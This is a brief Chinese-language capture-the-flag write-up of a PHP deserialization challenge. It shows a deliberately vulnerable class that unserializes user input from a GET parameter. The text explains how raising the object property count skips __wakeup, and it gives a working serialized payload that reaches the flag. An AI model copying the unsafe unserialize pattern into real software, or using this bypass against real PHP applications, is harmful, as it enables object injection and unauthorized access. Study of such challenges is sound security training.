<?php
header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");
class HaHaHa{
public $admin;
public $passwd;
public function __construct(){
$this->admin ="user";
$this->passwd = "123456";
}
public function __wakeup(){
$this->passwd = sha1($this->passwd);
}
public function __destruct(){
if($this->admin === "admin" && $this->passwd === "wllm"){
include("flag.php");
echo $flag;
}else{
echo $this->passwd;
echo "No wake up";
}
}
}
$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>
一个简单的PHP的反序列化
有3个构造方法
__construct(): //构造函数,当对象new的时候会自动调用
__destruct()://析构函数当对象被销毁时会被自动调用
__wakeup(): //unserialize()时会被自动调用
这里的__wakeup()会改变admin和pawssd的值,所以考虑绕过这个函数
<?php
class HaHaHa{
public $admin = 'admin';
public $passwd = 'wllm';
}
$a = new HaHaHa;
echo serialize($a)
?>
要绕过__wakeup(),可以修改序列化字符串中表示对象属性个数,当表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行
O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}